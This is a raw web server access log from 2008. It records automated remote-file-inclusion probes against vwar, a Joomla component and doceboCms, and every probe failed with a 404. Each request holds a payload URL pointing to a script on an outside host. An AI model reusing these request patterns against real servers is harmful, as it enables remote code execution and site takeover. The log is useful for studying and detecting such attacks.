118.45.190.173 - - [08/Feb/2008:07:46:39 -0800] "GET //vwar/admin/?vwar_root=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:07:46:40 -0800] "GET /logs//vwar/admin/?vwar_root=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
69.60.121.56 - - [08/Feb/2008:07:48:14 -0800] "GET //tool/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.135.60.137 - - [08/Feb/2008:07:48:21 -0800] "GET /logs/access_071222.log//account.php?action=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.60.137 - - [08/Feb/2008:07:48:23 -0800] "GET /logs/access_071222.log//account.php?action=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.162.134.131 - - [08/Feb/2008:07:48:24 -0800] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/bokepan_ya/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
